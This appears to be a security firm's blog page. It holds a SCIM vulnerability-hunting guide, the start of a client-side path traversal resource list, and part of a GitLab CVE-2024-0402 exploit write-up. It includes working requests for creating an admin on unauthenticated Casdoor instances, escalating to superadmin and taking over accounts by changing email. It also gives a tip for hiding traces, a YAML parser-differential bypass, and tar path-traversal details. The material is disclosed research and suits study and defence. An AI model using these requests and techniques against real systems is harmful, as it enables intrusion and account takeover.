ABOUT US

We are security engineers who break bits and tell stories.

Visit us

doyensec.com

Follow us

@doyensec

Engage us

info@doyensec.com


© 2026 Doyensec LLC

Single Sign-On (SSO) related bugs have received an incredible amount of hype, and a lot of amazing public disclosures, in recent years. Just to cite a few examples:

And so on: there is a lot of gold out there.

Not surprisingly, systems using a custom implementation are the most affected, since integrating SSO with a platform's User object model is not trivial.

However, while SSO often takes center stage, another standard is often under-tested: SCIM (System for Cross-domain Identity Management). In this blog post, we will dive into its core aspects and the insecure design issues we often find while testing our clients' implementations.

Classic AI Generated Placeholder Image



SCIM is a standard designed to automate the provisioning and deprovisioning of user accounts across systems, ensuring consistent access across the connected systems.

The standard is defined in the following RFCs: RFC7642 (definitions, overview, concepts, and requirements), RFC7643 (core schema), and RFC7644 (protocol).

Although it was not designed specifically as an IdP-to-SP protocol, but rather as a generic protocol for syncing user pools across cloud environments, real-world deployments mostly embed it in the IdP-SP relationship.

To make a long story short, the standard defines a set of RESTful APIs exposed by Service Providers (SPs), which other actors (mostly Identity Providers) call to update the user pool.

It provides REST APIs with the following set of operations to edit the managed objects (see scim.cloud):



| Operation | Method | Endpoint |
|---|---|---|
| Create | POST | https://example-SP.com/{v}/{resource} |
| Read | GET | https://example-SP.com/{v}/{resource}/{id} |
| Replace | PUT | https://example-SP.com/{v}/{resource}/{id} |
| Delete | DELETE | https://example-SP.com/{v}/{resource}/{id} |
| Update | PATCH | https://example-SP.com/{v}/{resource}/{id} |
| Search | GET | https://example-SP.com/{v}/{resource}?<SEARCH_PARAMS> |
| Bulk | POST | https://example-SP.com/{v}/Bulk |

So, we can summarize SCIM as a set of APIs that perform CRUD operations on JSON-encoded objects representing user identities.

Core Functionalities

If you want to look into a SCIM implementation for bugs, here is a list of core functionalities that would need to be reviewed during an audit:

- & || safety checks.
- internal attributes that should not be user-controlled, platform-specific attributes not allowed in SCIM, etc.
- email update should trigger a confirmation flow / flag the user as unconfirmed, username update should trigger ownership / pending invitations / re-auth checks and so on.

SCIM is direct IdP-to-SP communication, so most of the resulting issues will require some level of access to either the IdP or the SP. This added attack complexity may lower the severity of most of your findings. On the other hand, the impact can skyrocket in multi-tenant platforms, where SCIM users may lack the usual tenant-isolation logic.

The following are some juicy examples of bugs you should look for while auditing SCIM implementations.

A few months ago, we published our advisory for Unauthenticated SCIM Operations In Casdoor IdP Instances. Casdoor is an open-source identity solution supporting various auth standards such as OAuth, SAML, and OIDC. SCIM was of course included, but as a service. This means Casdoor (the IdP) would also allow external actors to manipulate its user pool.

Casdoor used the elimity-com/scim library, which, as per the standard, does not include authentication in its default configuration. Consequently, a SCIM server defined and exposed with this library remains unauthenticated unless the application adds its own authentication layer.

server := scim.Server{
	Config:        config,
	ResourceTypes: resourceTypes,
}

Exploiting an instance required an email address matching one of the configured domains. A SCIM POST operation could be used to create a new user matching the internal email domain and data.

➜ curl --path-as-is -i -s -k -X $'POST' \
    -H $'Content-Type: application/scim+json' \
    --data-binary $'{\"active\":true,\"displayName\":\"Admin\",\"emails\":[{\"value\":\"admin2@victim.com\"}],\"password\":\"12345678\",\"nickName\":\"Attacker\",\"schemas\":[\"urn:ietf:params:scim:schemas:core:2.0:User\",\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\"],\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\":{\"organization\":\"built-in\"},\"userName\":\"admin2\",\"userType\":\"normal-user\"}' \
    $'https://<CASDOOR_INSTANCE>/scim/Users'

Then, authenticate to the IdP dashboard with the new admin user admin2:12345678.

Note: The maintainers released a new version (v1.812.0), which includes a fix.

While that was a very simple yet critical issue, authentication bypasses can also be found in authenticated implementations. In other cases, the service may be exposed only internally and left unprotected.

[*] IdP-Side Issues

Since SCIM secrets allow dangerous actions on Service Providers, they should be protected from extraction after setup. Testing or editing an IdP SCIM integration on an already configured application should require a new SCIM token as input if the connector URL differs from the previously set one.

A well-known IdP was found sending SCIM integration test requests to /v1/api/scim/Users?startIndex=1&count=1 with the old secret while accepting a new baseURL. Anyone able to edit the integration could therefore point it to a server under their control and receive the stored secret.
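The expected IdP-side behavior can be sketched as a simple rule: an edit or a connection test may reuse the stored token only if the destination is unchanged. The types and function names below are hypothetical. The URL normalization (lowercased scheme and host, no trailing slash) is one possible assumption about what counts as "the same destination".

```go
package main

import (
	"errors"
	"net/url"
	"strings"
)

// Integration is a hypothetical stored SCIM connector configuration.
type Integration struct {
	BaseURL string
	Token   string
}

// IntegrationUpdate is an edit or test request; Token is empty when the
// admin did not re-enter a secret.
type IntegrationUpdate struct {
	BaseURL string
	Token   string
}

// normalizeURL canonicalizes scheme, host case, and trailing slashes so
// cosmetic edits are not treated as a new destination.
func normalizeURL(raw string) (string, error) {
	u, err := url.Parse(raw)
	if err != nil || u.Host == "" {
		return "", errors.New("invalid base URL")
	}
	u.Scheme = strings.ToLower(u.Scheme)
	u.Host = strings.ToLower(u.Host)
	u.Path = strings.TrimRight(u.Path, "/")
	return u.String(), nil
}

// applyIntegrationUpdate refuses to reuse the stored token against a
// different base URL; the caller must supply a new one.
func applyIntegrationUpdate(cur *Integration, upd IntegrationUpdate) error {
	oldURL, err := normalizeURL(cur.BaseURL)
	if err != nil {
		return err
	}
	newURL, err := normalizeURL(upd.BaseURL)
	if err != nil {
		return err
	}
	if newURL != oldURL && upd.Token == "" {
		return errors.New("a new SCIM token is required when the base URL changes")
	}
	cur.BaseURL = upd.BaseURL
	if upd.Token != "" {
		cur.Token = upd.Token
	}
	return nil
}
```

The same check would apply to the test-connection action, since that request carried the old secret in the case above.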

+1 Extra - Covering traces: avoid logging errors by replying with a mocked JSON response that contains the data expected by a successful SCIM integration test.

An example of a mocked JSON response for a Users query:

{
  "Resources": [
    {
      "externalId": "<EXTID>",
      "id": "francesco+scim@doyensec.com",
      "meta": {
        "created": "2024-05-29T22:15:41.649622965Z",
        "location": "/Users/francesco+scim@doyensec.com",
        "version": "<VERSION>"
      },
      "schemas": [
        "urn:ietf:params:scim:schemas:core:2.0:User"
      ],
      "userName": "francesco+scim@doyensec.com"
    }
  ],
  "itemsPerPage": 2,
  "schemas": [
    "urn:ietf:params:scim:api:messages:2.0:ListResponse"
  ],
  "startIndex": 1,
  "totalResults": 8
}

[*] SP-Side Issues

SCIM token creation and reading should be allowed only for highly privileged users. Target the SP endpoints used to manage tokens and look for authorization issues. Alternatively, target them with a nice XSS or other vulnerabilities to escalate your access level in the platform.

Since (near) real-time user access management is the core of SCIM, it is also worth looking for fallbacks that let a deprovisioned user regain access to the SP.

As an example, let’s look at the update_scimUser function below.

def can_be_reprovisioned?(usrObj)
  return true if usrObj.respond_to?(:active) && !usrObj.active?
  false
end

def update_scimUser(usrObj)
  # [...]
  if parser.deprovision_user?
    # [...]
  # (o)__(o)'
  elsif can_be_reprovisioned?(usrObj)
    reprovision(usrObj)
  else
    true
  end
end

Since respond_to?(:active) is always true for SCIM identities, the condition !usrObj.active? evaluates to true whenever the user is not active, which triggers the re-provisioning.

Consequently, any SCIM update request (e.g., a last name change) will fall back to re-provisioning if the user was inactive for any reason (e.g., a logical ban or a forced removal).
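A safer shape for this logic, sketched under assumptions, reactivates an account only when the request explicitly sets active to true. Even then, it does so only for accounts that SCIM itself deprovisioned. The Account model, the InactiveReason values, and applySCIMUpdate are hypothetical. The original code is Ruby and only partially shown.

```go
package main

import "fmt"

// InactiveReason is a hypothetical record of why an account is inactive.
type InactiveReason int

const (
	NotInactive InactiveReason = iota
	DeprovisionedBySCIM
	BannedByAdmin
)

type Account struct {
	Active   bool
	Reason   InactiveReason
	LastName string
}

// SCIMUserUpdate carries only the attributes present in the request;
// Active is nil when "active" was not sent at all.
type SCIMUserUpdate struct {
	Active   *bool
	LastName *string
}

// applySCIMUpdate never reactivates as a side effect: only an explicit
// active=true can do it, and only for accounts SCIM itself deprovisioned.
func applySCIMUpdate(a *Account, upd SCIMUserUpdate) error {
	wantsActive := upd.Active != nil && *upd.Active
	// Decide on the access state first, so a rejected request changes nothing.
	if wantsActive && !a.Active && a.Reason != DeprovisionedBySCIM {
		return fmt.Errorf("refusing to reactivate account inactive for reason %d", a.Reason)
	}
	if upd.LastName != nil {
		a.LastName = *upd.LastName
	}
	if upd.Active != nil {
		if *upd.Active {
			a.Active, a.Reason = true, NotInactive
		} else if a.Active {
			a.Active, a.Reason = false, DeprovisionedBySCIM
		}
	}
	return nil
}
```

Whether an admin ban should ever be reversible via SCIM is a product decision. The key property is that unrelated attribute updates never touch the access state.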

When outsourcing identity syncing to SCIM, it becomes critical to choose what gets copied from the SCIM objects into the new internal ones, since bugs may arise from an “excessive” attribute allowance.

[*] Example 1 - Privesc To Internal Roles

A client allowed Okta Groups and Users to be provisioned and updated via SCIM endpoints.

It converted Okta Groups into internal roles with custom labeling to refer to “Okta resources”. In particular, the function resource_to_access_map constructed an unvalidated access mapping from the supplied SCIM group resource.

// [...]
group_data, decode_error := decode_group_resource(resource.Attributes.AsMap())
var role_list []string
// (o)__(o)'
if resource.Id != "" {
	role_list = []string{resource.Id}
}
// ...
return access_map, nil, nil

The implementation issue was that the role names in role_list were built from the id attribute of the Group resource (urn:ietf:params:scim:schemas:core:2.0:Group), which comes from a third-party source.

Later, another function upserted the Role objects built from the SCIM event without further checks. Hence, it was possible to overwrite any existing resource in the platform by using its name as the SCIM Group ID.

As an example, if the SCIM Group resource ID was set to an internal role name, funny things happened.

POST /api/scim/Groups HTTP/1.1
Host: <PLATFORM>
Content-Type: application/json; charset=utf-8
Authorization: Bearer 650…[REDACTED]…
…[REDACTED]…
Content-Length: 283

{
  "schemas": ["urn:ietf:params:scim:schemas:core:2.0:Group"],
  "id":"superadmin",
  "displayName": "TEST_NAME",
  "members": [{
    "value": "francesco@doyensec.com",
    "display": "francesco@doyensec.com"
  }]
}

The platform created an access map named TEST_NAME, granting the superadmin role to members.
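Below is one way to close this, shown as a hedged sketch rather than the client's actual fix. It treats the SCIM group id as untrusted: the id is forced into a dedicated namespace, and the code refuses to upsert onto any role not created via SCIM. The Role type, the scim: prefix, the id pattern, and upsertSCIMRole are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
)

// Role is a hypothetical internal role record.
type Role struct {
	Name   string
	Source string // "internal" or "scim"
}

// groupIDPattern is an assumed format for acceptable SCIM group ids.
var groupIDPattern = regexp.MustCompile(`^[A-Za-z0-9._-]{1,64}$`)

// roleNameForGroup maps an untrusted SCIM group id into a dedicated
// "scim:" namespace so it can never equal a built-in role name.
func roleNameForGroup(groupID string) (string, error) {
	if !groupIDPattern.MatchString(groupID) {
		return "", fmt.Errorf("invalid SCIM group id %q", groupID)
	}
	return "scim:" + groupID, nil
}

// upsertSCIMRole creates or returns a SCIM-managed role and refuses to
// touch any role that was not created through SCIM.
func upsertSCIMRole(roles map[string]*Role, groupID string) (*Role, error) {
	name, err := roleNameForGroup(groupID)
	if err != nil {
		return nil, err
	}
	if existing, ok := roles[name]; ok {
		if existing.Source != "scim" {
			return nil, errors.New("refusing to overwrite non-SCIM role " + name)
		}
		return existing, nil
	}
	r := &Role{Name: name, Source: "scim"}
	roles[name] = r
	return r, nil
}
```

With this mapping, a Group with "id":"superadmin" would produce a separate scim:superadmin role and leave the built-in superadmin untouched.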

[*] Example 2 - Mass Assignment In SCIM-To-User Mapping

Manipulating other internal attributes may be possible, depending on the object mapping strategy. A juicy example could look like the one below.

SSO_user.update!(
  external_id: scim_data["externalId"],
  # (o)__(o)'
  userData: Oj.load(scim_req_body),
)

Even if the Oj defaults are overridden (sorry, no deserialization), it could still be possible to put arbitrary data in the SCIM request and have it accessible through userData. The rest of the logic, meanwhile, assumes it only contains SCIM attributes.
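A common mitigation, sketched here under assumptions, is to persist an allowlisted subset of attributes instead of the raw request body. The allowedUserAttrs set and the filterSCIMUser helper are hypothetical. Matching is exact-case, so differently cased attribute names are dropped, which fails closed.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// allowedUserAttrs is an assumed allowlist of top-level SCIM User
// attributes the platform is willing to persist.
var allowedUserAttrs = map[string]bool{
	"schemas":     true,
	"externalId":  true,
	"userName":    true,
	"name":        true,
	"displayName": true,
	"emails":      true,
	"active":      true,
}

// filterSCIMUser keeps only allowlisted attributes from a raw SCIM body and
// reports the names of the dropped ones (useful for logging or alerting).
func filterSCIMUser(body []byte) (map[string]json.RawMessage, []string, error) {
	var raw map[string]json.RawMessage
	if err := json.Unmarshal(body, &raw); err != nil {
		return nil, nil, fmt.Errorf("invalid SCIM body: %w", err)
	}
	kept := make(map[string]json.RawMessage, len(raw))
	var dropped []string
	for k, v := range raw {
		if allowedUserAttrs[k] {
			kept[k] = v
		} else {
			dropped = append(dropped, k)
		}
	}
	return kept, dropped, nil
}
```

For example, a body such as {"userName":"alice","isAdmin":true} would keep userName and report isAdmin as dropped. Here isAdmin stands in for a hypothetical internal attribute.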

This category contains all the bugs that arise when required internal user-management processes are not applied to updates caused by SCIM events (e.g., email, phone, or userName verification).

An interesting related finding is Gitlab Bypass Email Verification (CVE-2019-5473). We have found similar cases involving the bypass of code verification processes during our assessments as well.

[*] Example - Same-Same But With Code Bypass

A SCIM email change did not trigger the confirmation flow required for other email change operations.

Attackers could request a verification code to their own email and change the email to the victim's address via SCIM. They could then redeem the code, thus verifying the new email address.

PATCH /scim/v2/<ATTACKER_SAML_ORG_ID>/<ATTACKER_USER_SCIM_ID> HTTP/2
Host: <CLIENT_PLATFORM>
Authorization: Bearer <SCIM_TOKEN>
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 205

{
  "schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
  "Operations": [
    {
      "op": "replace",
      "value": {
        "userName": "<VICTIM_ADDRESS>"
      }
    }
  ]
}
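The underlying fix can be sketched as two rules. First, every email change resets the verification state, whatever its channel. Second, a code only verifies the address it was sent to. Account, IssueCode, ChangeEmail, and RedeemCode are hypothetical names, and this is not the client's code.

```go
package main

import (
	"crypto/subtle"
	"errors"
)

// Account is a hypothetical user record with a pending email verification.
type Account struct {
	Email         string
	EmailVerified bool
	pendingCode   string
	pendingFor    string // address the pending code was sent to
}

// IssueCode stores a verification code bound to the current address.
func (a *Account) IssueCode(code string) {
	a.pendingCode, a.pendingFor = code, a.Email
}

// ChangeEmail is meant to be the single entry point for email updates,
// used by the UI and the SCIM handler alike: it drops verification state.
func (a *Account) ChangeEmail(newEmail string) {
	if newEmail == a.Email {
		return
	}
	a.Email = newEmail
	a.EmailVerified = false
	a.pendingCode, a.pendingFor = "", ""
}

// RedeemCode verifies the current address only with a code issued for it.
func (a *Account) RedeemCode(code string) error {
	if a.pendingCode == "" || a.pendingFor != a.Email {
		return errors.New("no pending verification for the current address")
	}
	if subtle.ConstantTimeCompare([]byte(code), []byte(a.pendingCode)) != 1 {
		return errors.New("invalid verification code")
	}
	a.EmailVerified = true
	a.pendingCode, a.pendingFor = "", ""
	return nil
}
```

Either rule alone would have broken the attack above. Keeping both is cheap defense in depth.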

In multi-tenant platforms, the SSO-SCIM identity should be linked to an underlying user object. While it is not part of the RFCs, changes to user attributes such as userName and email must eventually trigger the platform's validation and ownership-check processes.

A public example where things did not go well while updating the underlying user is CVE-2022-1680 (Gitlab Account take over via SCIM email change). Below is a very similar instance we discovered at one of our clients.

[*] Example - Same-Same But Different

A client's platform allowed SCIM operations to change a user's email, leading to account takeover.

The function set_username was called every time a SCIM user was created or updated.

# [...]
underlying_user = sso_user.underlying_user
sso_user.scim["userName"] = new_name
sso_user.username = new_name
tenant = Tenant.find(sso_user.id)
underlying_user&.change_email!(
  new_name,
  validate_email: tenant.isAuthzed?(new_name)
)

def underlying_user
  return nil if !tenant.isAuthzed?(self.username)
  # [...]
  # (o)__(o)'
  @underlying_user = User.find_by(email: self.username)
end

The underlying_user should be nil, thus blocking the change, if the organization is not entitled to manage the user according to isAuthzed?. In our specific case, the authorization function did not protect users in a specific state from being taken over. SCIM could be used to forcefully change the victim user's email and take over the account once it was added to the tenant. Combined with the classic “Forced Tenant Join” issue, this could have made a nice chain.

Moreover, the platform did not protect against multi-SSO context-switching. Once authenticated with the new email, the attacker could therefore access all the other tenants the user was part of.
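Below is a hedged sketch of the missing check; the client's actual model and fix are not described here. The decision should rest on the account being modified, not only on the new address. That means checking who manages the account, which tenants it belongs to, and whether both addresses sit in domains the tenant has verified. The Tenant and User types, the ManagedBy field, and canChangeEmail are hypothetical.

```go
package main

import (
	"errors"
	"strings"
)

// Tenant is a hypothetical organization with its verified email domains.
type Tenant struct {
	ID              string
	VerifiedDomains map[string]bool
}

// User is a hypothetical underlying account.
type User struct {
	Email     string
	ManagedBy string   // tenant that provisioned the account, "" if self-registered
	Tenants   []string // every tenant the user is a member of
}

func domainOf(email string) string {
	at := strings.LastIndex(email, "@")
	if at < 0 {
		return ""
	}
	return strings.ToLower(email[at+1:])
}

// canChangeEmail decides whether tenant t may rewrite u's email via SCIM.
// It inspects the account being modified, not just the new value.
func canChangeEmail(t Tenant, u User, newEmail string) error {
	if u.ManagedBy != t.ID {
		return errors.New("account is not managed by this tenant")
	}
	for _, other := range u.Tenants {
		if other != t.ID {
			return errors.New("account also belongs to other tenants")
		}
	}
	if !t.VerifiedDomains[domainOf(u.Email)] || !t.VerifiedDomains[domainOf(newEmail)] {
		return errors.New("old and new addresses must both be in a verified domain")
	}
	return nil
}
```

The membership check also limits the multi-tenant blast radius mentioned above. An account shared with other tenants is never rewritten by a single tenant's SCIM feed.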

As per RFC7644, the path attribute is defined as:

The “path” attribute value is a String containing an attribute path describing the target of the operation. The “path” attribute is OPTIONAL for “add” and “replace” and is REQUIRED for “remove” operations.

Since the path attribute is OPTIONAL, the nil case must be handled carefully whenever it is part of the execution logic.

def exec_scim_ops(scim_identity, operation)
  path = operation["path"]
  value = operation["value"]
  case path
  when "members"
    # [...]
  when "externalId"
    # [...]
  else
    # semi-Catch-All Logic!
  end
end

A catch-all default branch could let an alternative PatchOp syntax hit one of the restricted cases while skipping its checks. Here is an example SCIM request body that would skip the externalId checks and still edit it in the context above:

{
  "schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
  "Operations": [
    {
      "op": "replace",
      "value": {
        "externalId": "<ID_INJECTION>"
      }
    }
  ]
}

When path is omitted, the value of an operation is allowed to contain a dict of <Attribute:Value> pairs.



Since bulk operations may be supported (currently in very few cases), specific issues could arise in those implementations:

- Race conditions: the ordering logic may not account for the extra processes triggered by each step.
- Missing circular reference protection: RFC7644 explicitly discusses Circular Reference Processing (see the example below).



Since SCIM uses JSON for data representation, JSON interoperability attacks could lead to most of the issues described in the hunting list. A well-known starting point is the article An Exploration of JSON Interoperability Vulnerabilities.

Once you identify the parsing library used by the SCIM implementation, check whether other internal logic relies on the stored JSON serialization while using a different parser for comparisons or unmarshaling.
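Here is an illustrative sketch of such a differential (not taken from a real finding). Go's encoding/json matches object keys to struct fields case-insensitively and lets a later match overwrite an earlier one. A generic map, by contrast, keeps both spellings as distinct keys. SCIM attribute names are case-insensitive per RFC7643, so a payload carrying both userName and USERNAME is not obviously malformed. The scimUser type and both helpers are hypothetical.

```go
package main

import "encoding/json"

// scimUser is a hypothetical typed view of a SCIM User.
type scimUser struct {
	UserName string `json:"userName"`
}

// viaStruct decodes into a struct. encoding/json matches keys to fields
// case-insensitively, so "USERNAME" also lands in UserName, and the last
// matching key in the document wins.
func viaStruct(body []byte) (string, error) {
	var u scimUser
	err := json.Unmarshal(body, &u)
	return u.UserName, err
}

// viaMap decodes into a generic map and reads the exact "userName" key,
// as another code path (or another parser) might do.
func viaMap(body []byte) (string, error) {
	var m map[string]any
	if err := json.Unmarshal(body, &m); err != nil {
		return "", err
	}
	s, _ := m["userName"].(string)
	return s, nil
}
```

With {"userName":"alice@corp.test","USERNAME":"victim@corp.test"}, the typed path sees the victim's address while the map-based path sees alice's. That is exactly the kind of split between a validation step and a storage step worth hunting for.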

Although JSON is a relatively simple format, parser differentials can lead to interesting cases, such as the one below:

As an extension of SSO, SCIM can enable critical exploits under specific circumstances. If you're testing SSO, SCIM should be in scope too!

Finally, most of the interesting vulnerabilities in SCIM implementations require a deep understanding of the application’s authorization and authentication mechanisms. The real value lies in identifying the differences between SCIM objects and the mapped internal User objects, as these discrepancies often lead to impactful findings.

As a follow-up to Maxence Schmitt's research on Client-Side Path Traversal (CSPT), we wanted to encourage researchers, bug hunters, and security professionals to explore CSPT further, as it remains an underrated yet impactful attack vector.

To support the community, we have compiled a list of blog posts, vulnerabilities, tools, CTF challenges, and videos related to CSPT. If anything is missing, let us know and we will update the post. Please note that the list is not ranked and does not reflect the quality or importance of the resources.

We hope this collection of resources will help the community better understand and explore Client-Side Path Traversal (CSPT) vulnerabilities. We encourage anyone interested to take a deep dive into CSPT techniques and possibilities, and to help us push the boundaries of web security. We wish you many exciting discoveries and plenty of CSPT-related bugs along the way!

This research project was made with ♡ by Maxence Schmitt, thanks to the 25% research time Doyensec gives its engineers. If you would like to learn more about our work, check out our blog, follow us on X, Mastodon, BlueSky or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

I know, we have written it multiple times now, but in case you are just tuning in, Doyensec found themselves on a cruise ship touring the Mediterranean for our company retreat. To kill time between parties, we held some hacking sessions analyzing real-world vulnerabilities, resulting in the !exploitable blog post series.

In Part 1 we covered our journey into IoT ARM exploitation, while Part 2 followed our attempts to exploit the bug used by Trinity in The Matrix Reloaded movie.



For this episode, we will dive into the exploitation of CVE-2024-0402 in GitLab. Like an onion, there is always another layer beneath the surface of this bug, from YAML parser differentials to path traversal in decompression functions in order to achieve arbitrary file write in GitLab.

No public Proof of Concept had been published, and building one turned out to be an adventure. It deserved an extension of the original author's blog post with the PoC-related info, to close the circle 😉



This vulnerability impacts the GitLab Workspaces functionality. To make a long story short, Workspaces let developers instantly spin up integrated development environments (IDEs) with all dependencies, tools, and configurations ready to go.

The whole Workspaces functionality relies on several components, including a running Kubernetes GitLab Agent and a devfile configuration.

Kubernetes GitLab Agent: The Kubernetes GitLab Agent connects GitLab to a Kubernetes cluster, letting users automate deployment processes and making it easier to integrate GitLab CI/CD pipelines. It also enables Workspaces creation.

Devfile: an open standard defining containerized development environments. It is configured with YAML files that define the tools, runtime, and dependencies a project needs.

Example of a devfile configuration (to be placed in the GitLab repository as .devfile.yaml):

apiVersion: 1.0.0
metadata:
  name: my-app
components:
  - name: runtime
    container:
      image: registry.access.redhat.com/ubi8/nodejs-14
      endpoints:
        - name: http
          targetPort: 3000

Let’s start with the publicly available information enriched with extra code-context.

GitLab was using the devfile Gem (Ruby of course) making calls to the external devfile binary (written in Go) in order to process the .devfile.yaml files during Workspace creation in a specific repository.

During the devfile pre-processing routine applied by Workspaces, a specific validator named validate_parent was called by PreFlattenDevfileValidator in GitLab.

# gitlab-v16.8.0-ee/ee/lib/remote_development/workspaces/create/pre_flatten_devfile_validator.rb:50
...
def self.validate_parent(value)
  value => { devfile: Hash => devfile }
  return err(_("Inheriting from 'parent' is not yet supported")) if devfile['parent']
  Result.ok(value)
end
...

But what is the parent option? As per the Devfile documentation:

If you designate a parent devfile, the given devfile inherits all its behavior from its parent. Still, you can use the child devfile to override certain content from the parent devfile.

Then, it proceeds to describe three types of parent references:

As with any other remote-fetching functionality, it is worth reviewing for bugs. At first glance, however, the option seems to be blocked by validate_parent.

As is widely known, even the most widely used implementations of a standard may deviate slightly from its specification. In this specific case, a YAML parser differential between Ruby and Go was needed.

The author blessed us with a new trick for our differentials notes. In the YAML Spec:

! is used for custom or application-specific data types

my_custom_data: !MyType "some value"

!! is used for built-in YAML types

bool_value: !!bool "true"

He found that the local tag notation ! (RFC reference), when written as !binary, still activates Base64 binary decoding in Ruby's yaml library. Go's gopkg.in/yaml.v3, by contrast, just drops the tag, leading to the following behavior:

➜ cat test3.yaml
normalk: just a value
!binary parent: got injected

### valid parent option added in the parsed version (!binary dropped)
➜ go run g.go test3.yaml
parent: got injected
normalk: just a value

### invalid parent option as Base64 decoded value (!binary evaluated)
➜ ruby -ryaml -e 'x = YAML.safe_load(File.read("test3.yaml"));puts x'
{"normalk"=>"just a value", "\xA5\xAA\xDE\x9E"=>"got injected"}

Consequently, it was possible to pass GitLab a devfile with a parent option through the validate_parent function and reach the devfile binary execution with it.
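To make the differential concrete, the toy model below reproduces the key each side ends up with. It does not use the real YAML parsers. rubyView approximates Ruby's !binary handling with Go's base64.RawStdEncoding, because Ruby's decoder is lenient about padding. goView reproduces the tag-dropping shown in the go run output above. All three helpers are hypothetical.

```go
package main

import (
	"encoding/base64"
	"strings"
)

const binaryTag = "!binary "

// rubyView models the Ruby side: a "!binary" key is Base64-decoded.
// Trailing '=' is trimmed and RawStdEncoding used to mimic lenient decoding.
func rubyView(rawKey string) string {
	if !strings.HasPrefix(rawKey, binaryTag) {
		return rawKey
	}
	enc := strings.TrimRight(strings.TrimPrefix(rawKey, binaryTag), "=")
	decoded, err := base64.RawStdEncoding.DecodeString(enc)
	if err != nil {
		return enc
	}
	return string(decoded)
}

// goView models gopkg.in/yaml.v3 as observed above: the local tag is
// dropped and the plain scalar is kept.
func goView(rawKey string) string {
	return strings.TrimPrefix(rawKey, binaryTag)
}

// validatorSeesParent mimics a check like devfile['parent'] performed on
// the Ruby-side view of the document.
func validatorSeesParent(rawKey string) bool {
	return rubyView(rawKey) == "parent"
}
```

Decoding "parent" as Base64 yields exactly the \xA5\xAA\xDE\x9E bytes seen in the Ruby output, so the Ruby-side lookup finds nothing. A general mitigation for this class of bug is to validate the same parsed representation that the downstream consumer will use.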

At this point, we need to switch to a bug discovered in the devfile binary (Go implementation).

After looking into a dependency of a dependency of a dependency, the hunter got his hands on the decompress function. It took tar.gz archives from the registry library and extracted their files on the GitLab server, which would later move them into the deployed Workspace environment.

Here is the vulnerable decompression function used by getResourcesFromRegistry:

// decompress extracts the archive file
func decompress(targetDir string, tarFile string, excludeFiles []string) error {
	var returnedErr error

	reader, err := os.Open(filepath.Clean(tarFile))
	// ...
	gzReader, err := gzip.NewReader(reader)
	// ...
	tarReader := tar.NewReader(gzReader)
	for {
		header, err := tarReader.Next()
		// ...
		target := path.Join(targetDir, filepath.Clean(header.Name))
		switch header.Typeflag {
		// ...
		case tar.TypeReg:
			/* #nosec G304 -- target is produced using path.Join which cleans the dir path */
			w, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))
			if err != nil {
				returnedErr = multierror.Append(returnedErr, err)
				return returnedErr
			}
			/* #nosec G110 -- starter projects are vetted before they are added to a registry. Their contents can be seen before they are downloaded */
			_, err = io.Copy(w, tarReader)
			if err != nil {
				returnedErr = multierror.Append(returnedErr, err)
				return returnedErr
			}
			err = w.Close()
			if err != nil {
				returnedErr = multierror.Append(returnedErr, err)
				return returnedErr
			}
		default:
			log.Printf("Unsupported type: %v", header.Typeflag)
		}
	}
	return nil
}

The function opens tarFile and iterates through its contents with tarReader.Next(). Only contents of type tar.TypeDir and tar.TypeReg are processed, preventing symlink and other nested exploitations.

Nevertheless, the line target := path.Join(targetDir, filepath.Clean(header.Name)) is vulnerable to path traversal for the following reasons:

- header.Name comes from a remote tar archive served by the devfile registry
- filepath.Clean is known for not preventing path traversals on relative paths (../ is not removed)

The resulting execution will be something like:

fmt.Println(filepath.Clean("/../../../../../../../tmp/test")) // absolute path
fmt.Println(filepath.Clean("../../../../../../../tmp/test"))  // relative path

// prints
// /tmp/test
// ../../../../../../../tmp/test

There are plenty of scripts to create a valid PoC archive exploiting such a directory traversal pattern (e.g., evilarc.py).

The requirements to exploit this vuln are:

- The devfile lib fetching files from a remote registry, which allowed a devfile registry containing a malicious .tar archive to write arbitrary files within the devfile client system.
- A .devfile.yaml definition including the parent option, which forces the GitLab server to use the malicious registry, hence triggering the arbitrary file write on the server itself.

To ensure you have the full picture, I must tell you what it's like to configure Workspaces in GitLab with slow internet while on a cruise 🌊: an absolute nightmare!

Of course, there are the docs on how to do so, but today you will be blessed with some extra finds:

web-ide-injector container image.

ubuntu@gitlabServer16.8:~$ find / -name "editor_component_injector.rb" 2>/dev/null
/opt/gitlab/embedded/service/gitlab-rails/ee/lib/remote_development/workspaces/create/editor_component_injector.rb

Replace the web-ide-injector image value at line 129 of that file with:

registry.gitlab.com/gitlab-org/gitlab-web-ide-vscode-fork/gitlab-vscode-build:latest

remote_development option to allow Workspaces.

config.yaml file for it:

remote_development:
  enabled: true
  dns_zone: "workspaces.gitlab.yourdomain.com"
observability:
  logging:
    level: debug
    grpc_level: warn

May the force be with you while configuring it.



As previously stated, this bug chain is layered like an onion. Here is a classic 2025 AI generated image sketching it for us:

The publicly available information left us with the following tasks if we wanted to exploit it:

- .devfile.yaml pointing to it in a target GitLab repository

In order to find out where the malicious.tar belonged, we had to take a step back and read some more code.

In particular, we had to understand the context in which the vulnerable decompress function was being called.

We ended up reading PullStackByMediaTypesFromRegistry, a function used to pull a specified stack with allowed media types from a given registry URL to some destination directory.

See library.go:293:

func PullStackByMediaTypesFromRegistry(registry string, stack string, allowedMediaTypes []string, destDir string, options RegistryOptions) error {
	//...
	//Logic to Pull a stack from registry and save it to disk
	//...

	// Decompress archive.tar
	archivePath := filepath.Join(destDir, "archive.tar")
	if _, err := os.Stat(archivePath); err == nil {
		err := decompress(destDir, archivePath, ExcludedFiles)
		if err != nil {
			return err
		}
		err = os.RemoveAll(archivePath)
		if err != nil {
			return err
		}
	}
	return nil
}



The code pattern highlighted that devfile registry stacks were involved and that they included some archive.tar file in their structure.

Why should a devfile stack contain a tar?

An archive.tar file may be included in the package to distribute starter projects or pre-configured application templates. It helps developers quickly set up their workspace with example code, configurations, and dependencies.

A few quick GitHub searches into the devfile registry build process revealed where our target .tar file should go. It belongs within the registry project under stacks/<STACK_NAME>/<STACK_VERSION>/archive.tar, in the same directory as the devfile.yaml for the specific version being deployed.

